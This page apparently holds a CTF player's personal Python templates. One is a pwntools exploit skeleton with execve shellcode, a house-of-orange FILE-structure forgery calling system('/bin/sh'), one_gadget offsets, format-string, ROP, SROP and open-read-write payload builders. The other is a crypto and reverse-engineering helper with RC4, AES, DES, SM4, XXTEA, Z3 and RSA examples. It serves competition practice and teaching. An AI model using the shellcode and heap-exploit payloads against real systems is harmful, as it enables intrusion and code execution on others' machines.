搭建之路

# -*- coding: utf-8 -*-
from pwn import *
#from LibcSearcher import *
from libformatstr import FormatStr
context.log_level = 'debug'
context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
context(arch='i386', os='linux')
local = 1
elf = ELF('./pwn1')
if local:
    p = process('./pwn1')
    libc = elf.libc
else:
    p = remote('116.85.48.105',5005)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


#obj = LibcSearcher("fgets", 0x7ff39014bd90) # 使用一个已知符号地址作为初始约束，初始化 LibcSearcher
#obj.add_condition("atoi", 218528) # 添加一个约束条件
#obj.dump("printf") # 根据已有约束条件，查询某个符号在 Libc 中的地址

#onegadget64(libc.so.6)
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
# one23 = [0x45226,0x4527a,0xf03a4,0xf1247]
# one27 = [0x4f2c5,0x4f322,0x10a38c]
# one29 = [0xe237f,0xe2383,0xe2386,0x106ef8]
# one31 = [0xe6ce3,0xe6ce6,0xe6ce9]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# fmt_payload
# py32 = fmtstr_py(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.py(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    py = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    py += p64(_IO_str_jumps_addr-8)  # vtable
    py += p64(0) # paddding
    py += p64(system_addr)
    return py

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_py(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  py = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return py

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()


def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))

# with open('1.txt','wb+') as f:
#     s = ""
#     for i in shellcode:
#         s += "0x" + i.encode("hex")
#     for i in s:
#         f.write(i)

# def mid_overflow(offset,func_got,rdi,rsi,rdx,next_func):
#     py = ''
#     py += 'a'*offset
#     py += 'a'*8
#     py += p64(pppppp_ret)
#     py += p64(0)
#     py += p64(0)
#     py += p64(1)
#     py += p64(func_got)
#     py += p64(rdx)
#     py += p64(rsi)
#     py += p64(rdi)
#     py += p64(mov_ret)
#     py += p64(0)
#     py += p64(0)
#     py += p64(0)
#     py += p64(0)
#     py += p64(0)
#     py += p64(0)
#     py += p64(0)
#     py += p64(next_func)
#     return py


def add(size,content):
    ru("> ")
    sl('1')
    ru()
    sl(str(size))
    ru()
    sd(content)
def free(index):
    ru("> ")
    sl('3')
    ru()
    sl(str(index))
def edit(index,content):
    ru("> ")
    sl('2')
    ru()
    sl(str(index))
    ru()
    sd(content)
def show(index):
    ru("> ")
    sl('4')
    ru()
    sl(str(index))




#libc_base = u64(rc(6).ljust(8,'\x00'))
#print "libc_base--->" + hex(libc_base)
#malloc_hook = libc_base + libc.sym["__malloc_hook"]
#fake_chunk = malloc_hook - 0x23
#onegadget = libc_base + one64[2]
#realloc = libc_base + libc.sym["realloc"]
#free_hook = libc_base + libc.sym["__free_hook"]
#system = libc_base + libc.sym["system"]
#binsh = libc_base + libc.search("/bin/sh").next()
#setcontext = libc_base + libc.sym["setcontext"]
#magic_gadget = libc_base + 0x00000000001547a0
#pop_rdi_ret = 0x0000000000400ea3
#pop_rdx_rsi_ret = libc_base + 0x0000000000115189
#syscall = libc_base + 0x00000000000bc3f5 
#pop_rax_ret = libc_base + 0x000000000003a738
#leave_ret = libc_base + 0x0000000000400b8c

#frame = SigreturnFrame()#read(0,free_hook,0x1000) syscall
#frame.rdi = 0
#frame.rsi = bss#rdi+0x70
#frame.rdx = 0x1000#rdi+0x50
#frame.rsp = bss#ret
#frame.rip = syscall_ret#rsp->rip
#a = len(str(frame))
#print "length--->" + hex(a)
#edit(0,str(frame))


# def srop_pay():
#     pay = ''
#     pay += p64(0) + p64(pay_start)
#     pay = pay.ljust(0x20,'\x00')
#     pay += p64(setcontext+33)
#     pay = pay.ljust(0x68,'\x00')
#     pay += p64(0)
#     pay += p64(pay_start)
#     pay += p64(0)
#     pay += p64(0)
#     pay += p64(0x110)
#     pay = pay.ljust(0xa0,'\x00')
#     pay += p64(pay_start)
#     pay += p64(syscall_ret)
#     pay = pay.ljust(0xe0,'\x00')
#     pay += p64(pay_start)
#     return pay

# def orw_pay(flag_addr,addr):
#     py = ''
#     py += p64(pop_rdi_ret)
#     py += p64(flag_addr)
#     py += p64(pop_rdx_rsi_ret)
#     py += p64(0)
#     py += p64(0)
#     py += p64(pop_rax_ret)
#     py += p64(2)
#     py += p64(syscall)
#     py += p64(pop_rdi_ret)
#     py += p64(3)
#     py += p64(pop_rdx_rsi_ret)
#     py += p64(0x80)
#     py += p64(addr)
#     py += p64(pop_rax_ret)
#     py += p64(0)
#     py += p64(syscall)
#     py += p64(pop_rdi_ret)
#     py += p64(1)
#     py += p64(pop_rax_ret)
#     py += p64(1)
#     py += p64(syscall)
#     py += "./flag\x00\x00"
#     return py



# i = 0
# while 1:
#     print i
#     i += 1
#     try:
#         pwn()
#     except EOFError:
#         p.close()
#         local = 1
#         elf = ELF('./note_five')
#         if local:
#             p = process('./note_five')
#             libc = elf.libc
#             continue
#         else:
#             p = remote('121.40.246.48',9999)
#             libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#     else:
#         sl("ls")
#         break
p.interactive()

# -*- coding: utf-8 -*-
from Crypto.Cipher import ARC4,AES,DES
from Crypto.Util.Padding import unpad
from binascii import *
import base64
import re
import hashlib
from z3 import *
from gmpy2 import *
import libnum
from Crypto.Util.number import *
import xxtea
import sm4

# #sm4
# cipher=[0xEA,0x63,0x58,0xB7,0x8C,0xE2,0xA1,0xE9,0xC5,0x29,0x8F,0x53,0xE8,0x8,0x32,0x59,0xAF,0x1B,0x67,0xAE,0xD9,0xDA,0xCF,0xC4,0x72,0xFF,0xB1,0xEC,0x76,0x73,0xF3,0x6]
# cipher1=bytes(cipher[:16])
# cipher2=bytes(cipher[16:])
# print(len(cipher2))
# key1=sm4.SM4Key(b'Ez_5M4_C1pH@r!!!')
# print(key1.decrypt(cipher1)+key1.decrypt(cipher2))


# table1 = [
#         'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
#         'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
#         'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
#         'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/','=']
# table2 = [0x37, 0x34, 0x35, 0x32, 0x33, 0x30, 0x31, 0x3E, 0x3F, 0x3C, 0x3D, 0x3A, 0x3B, 0x38, 0x39, 0x26, 0x27, 0x24, 0x25, 0x22, 0x23, 0x20, 0x21, 0x2E, 0x2F, 0x2C, 0x17, 0x14, 0x15, 0x12, 0x13, 0x10, 0x11, 0x1E, 0x1F, 0x1C, 0x1D, 0x1A, 0x1B, 0x18, 0x19, 0x06, 0x07, 0x04, 0x05, 0x02, 0x03, 0x00, 0x01, 0x0E, 0x0F, 0x0C, 0x46, 0x47, 0x44, 0x45, 0x42, 0x43, 0x40, 0x41, 0x4E, 0x4F, 0x5D,0x59]

# def rc4_decrypt(cipher, key):
#     rc4 = ARC4.new(key)
#     return rc4.decrypt(cipher)
# def rc4_encrypt(cipher, key):
#     rc4 = ARC4.new(key)
#     return rc4.encrypt(cipher)
# def aes_decrypt_ECB(cipher, key):
#     aes = AES.new(key, AES.MODE_ECB)
#     return aes.decrypt(cipher)
# def aes_decrypt_CBC(cipher, key, IV):
#     aes = AES.new(key, IV = IV,mode=AES.MODE_CBC)
#     return aes.decrypt(cipher)
# def aes_encrypt_ECB(cipher, key):
#     aes = AES.new(key, AES.MODE_ECB)
#     return aes.encrypt(cipher)
# def aes_encrypt_CBC(cipher, key, IV):
#     aes = AES.new(key, IV = IV,mode=AES.MODE_CBC)
#     return aes.encrypt(cipher)
# def des_decrypt_ECB(cipher, key):
#     des = DES.new(key, DES.MODE_ECB)
#     return des.decrypt(cipher)
# def des_encrypt_ECB(cipher, key):
#     des = DES.new(key, DES.MODE_ECB)
#     return des.encrypt(cipher)
# def des_encrypt_CBC(cipher, key,IV):
#     des = DES.new(key, IV=IV, mode=DES.MODE_CBC)
#     return des.encrypt(cipher)
# def des_decrypt_CBC(cipher, key,IV):
#     des = DES.new(key, IV=IV, mode=DES.MODE_CBC)
#     return des.decrypt(cipher)

# #AES DES RC4
# key = b"De1CTF"
# rc4_key = key
# des_key = key.ljust(8, b"\x00")
# des_IV = b"\x01\x02\x03\x04\x05\x06\x07\x08"
# aes_key = key.ljust(16, b"\x00")
# aes_IV = b"\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"

# minwen = b"flag{1234567890}"

# print(rc4_encrypt(minwen,rc4_key).hex())
# cipher = "9fc730a2fa6d55afa5e2835a383e70ee"
# cipher = bytes.fromhex(cipher)
# print(rc4_decrypt(cipher,key))

# print(aes_encrypt_CBC(minwen,aes_key,aes_IV).hex())
# cipher1 = "44d39494cfc13982a4e131677d8ca5a3"
# cipher1 = bytes.fromhex(cipher1)
# print(aes_decrypt_CBC(cipher1,aes_key,aes_IV))

# print(aes_encrypt_ECB(minwen,aes_key).hex())
# cipher2 = "8cb1a49f4c7616b412a3a47318d8a32f"
# cipher2 = bytes.fromhex(cipher2)
# print(aes_decrypt_ECB(cipher2,aes_key))

# print(des_encrypt_ECB(minwen,des_key).hex())
# cipher3 = "4464cd4a107144a7f2b5ca8b6dda926b"
# cipher3 = bytes.fromhex(cipher3)
# print(des_decrypt_ECB(cipher3,des_key))

# print(des_encrypt_CBC(minwen,des_key,des_IV).hex())
# cipher4 = "3dbaf9c38dc5807595f23b8d7bcac28e"
# cipher4 = bytes.fromhex(cipher4)
# print(des_decrypt_CBC(cipher4,des_key,des_IV))



# # Base64
# c = [4, 19, 0, 19, 4, 5, 19, 93]
# code =''
# for i in c:
#   code += table1[table2.index(i)]
# print(base64.b64decode(code).hex())

# bb = b"\x78\x6f\x66"
# print(bb.hex())
# a = 'aabbccddeeff'
# a_bytes = bytes.fromhex(a)
# print(a_bytes)

# # Z3
# def change1(x):
#     for i in range(1,len(x)):
#       for j in range(0,i//3,1):
#             x[i] ^= x[j]
#     return x
# f = [BitVec("x%d"%i, 8) for i in range(24)]
# fc = [BitVec("x%d"%i, 8) for i in range(24)]
# ft = change1(f)
# dt = [0xCE, 0xBC, 0x40, 0x6B, 0x7C, 0x3A, 0x95, 0xC0, 0xEF, 0x9B, 0x20, 0x20, 0x91, 0xF7, 0x02, 0x35, 0x23, 0x18, 0x02, 0xC8, 0xE7, 0x56, 0x56, 0xFA]
# s = Solver()
# for i in range(24):
#     s.add(ft[i] == dt[i])
# s.check()
# m = s.model()
# ans = []
# for i in range(24):
#     ans.append(m[fc[i]].as_long())
# print(ans)

# # RSA
# n = 3161262255255421133292506694323988711204792818702640666084331634444148712428915950639954540974469931426618702044672318134908678730641981414037034058320359158246813987154679178159391832232990193738454116371045928434239936027006539348488316754611586659587677659791620481200732564068367148541242426533823626586574915275209508300120574819113851895932912208783915652764568319771482309338434364094681579135086703127977870534715039005822312878739611630155714313119545610939253355808742646891815442758660278514976431521933763272615653261044607041876212998883732724662410197038419721773290601109065965674129599626151139566369
# e = 65537
# c = 631583911592660652215412683088688785438938386403323323131247534561958531288570612134139288090533619548876156447498627938626419617968918299212863936839701943643735437264304062828205809984533592547599060829451668240569384130130080928292082888526567902695707215660020201392640388518379063244487204881439591813398495285025704285781072987024698133147354238702861803146548057736756003294248791827782280722670457157385205787259979804892966529536902959813675537028879407802365439024711942091123058305460856676910458268097798532901040050506906141547909766093323197363034959926900440420805768716029052885452560625308314284406
# p = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848447
# q = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848927
# d = invert(e,(p-1)*(q-1))
# m = pow(c,d,n)
# print(long_to_bytes(m))

# # SHA256\MD5
# m = b"12345"
# c = hashlib.sha256(m).hexdigest()
# print(c)
# c = hashlib.md5(m).hexdigest()
# print(c)

# # XXTEA 
# text = b"1234567890123456"
# key = b"12345670"
# key = key.ljust(16,b"\x00")
# enc = b'\x90%\xc5X\x11\x07\xf9{u]\xdf\xe5\x84\xa6eV\xeb\x10f\x83'
# decrypt_data = xxtea.decrypt(enc, key)
# print(decrypt_data)

# # 正则匹配
# s = "1234abcd"
# p = re.compile('[0-9]')
# c = p.findall(s)
# d = re.sub("[^0-9]+","",s)
# print(c,d)